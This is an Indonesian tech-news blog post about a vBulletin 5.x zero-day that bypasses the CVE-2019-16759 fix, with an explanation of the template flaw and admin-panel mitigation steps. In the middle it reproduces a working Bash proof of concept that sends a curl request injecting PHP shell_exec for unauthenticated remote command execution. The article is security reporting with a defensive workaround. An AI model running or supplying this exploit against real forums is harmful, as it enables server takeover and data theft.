Eksploit Kode vBulletin Zero-Day Kembali Ditemukan

1 min read

Disclaimer
Saya bekerja di AWS, semua opini adalah dari saya pribadi. (I work for AWS, my opinions are my own.)
Eksploit Kode vBulletin Zero-Day Kembali Ditemukan
Photo by Clint Patterson on Unsplash

TeknoCerdas.com – Salam cerdas untuk kita semua. Dilansir dari ZDNet eksploit kode vBulletin zero-day kembali ditemukan. Eksploit zero-day ini dapat melakukan bypass terhadap patch yang telah dikeluarkan untuk CVE-2019-16759.

CVE-2019-16759 sendiri adalah patch yang dikeluarkan untuk mengatasi celah keamanan pada sistem template vBulletin. Dimana seorang attacker dapat menyisipkan dan menjalakan kode eksploit pada vBulletin tanpa perlu otentikasi. Ini adalah tipe celah keamanan remote code execution.

Versi vBulletin yang terkena dampak dari CVE-2019-16759 adalah vBulletin versi 5.0.0 sampai 5.5.4.

Peneliti keamanan Amir Etemadieh dalam blog pribadinya mendemonstrasikan proof-of-concept (PoC) bagaimana celah keamanan ini bisa dieksploitasi. Dalam tulisannya tersebut Amir menemukan masalah kenapa patch CVE-2019-16759 dapat dilewati.

Dua hal yang menjadi sumber masalah adalah:

  1. Kemampuan sebuah template untuk menampilkan child template yang dapat didefinisikan oleh pengguna.
  2. Saat menampilkan child template tersebut nilai dari child template tersebut dimasukkan dalam sebuah variabel widgetConfig.

Karena dua hal diatas maka CVE-2019-16759 dapat dilewati. Kode PoC dari celah keamanan ini juga ditunjukkan oleh Amir. Berikut adalah PoC yang ditulis dalam Bash.

#!/bin/bash
#
# vBulletin (widget_tabbedcontainer_tab_panel) 5.x 0day by @Zenofex
#
# Usage ./exploit  

# Urlencode cmd
CMD=`echo $2|perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'`

# Send request
curl -s $1/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("'+$CMD+'");exit;'

Tidak lama setelah kode zero-day diumumkan ke publik untuk celah keamanan ini, maka banyak yang komunitas hacking yang mencoba celah ini. Berikut adalah salah satu contohnya.

Salah satu pengguna Twitter yang mencoba celah keamanan CVE-2019-16759

Solusi Eksploit Kode vBulletin Zero-Day

Saat ini vBulletin belum mengeluarkan patch resmi terhadap celah keamanan terbaru ini. Dikutip dari blog Amir Etemadieh pemilik forum vBulletin dapat menonaktifkan PHP widget sebagai solusi jangka pendek. Langkah-langkah yang harus dilakukan adalah.

  1. Masuk pada vBulletin adminstrator control panel
  2. Klik menu “Settings” kemudian “Options” pada dropdown
  3. Pilih “General Settings” dan klik “Edit Settings”
  4. Cari pilihan “Disable PHP, Static HTML, and Ad Module rendering” dan set ke “Yes”
  5. Simpan perubahan

vBulletin adalah salah satu software forum terpopuler. Berdasarkan data dari W3Tech, vBulletin digunakan oleh 0.1% dari semua website. vBulletin versi 5 sendiri digunakan sebanyak 9% dari total instalasi vBulletin yang disurvey oleh W3Tech.

Melihat data statistik diatas para pemilik forum harus segera melakukan langkah diatas guna mencegah instalasi vBulletin mereka menjadi target dari serangan.

Avatar
Rio Astamal Adalah penulis utama di TeknoCerdas.com. Rio Astamal seorang yang sangat antusias dengan web development sejak 2003. Sejak November 2021 Rio Astamal bekerja di Amazon Web Services (AWS) sebagai Developer Advocate untuk Indonesia. Dia mengelola TeknoCerdas.com di waktu senggangnya sebagai salah satu sarana untuk ikut mencerdaskan pembaca dalam dunia IT.
«
»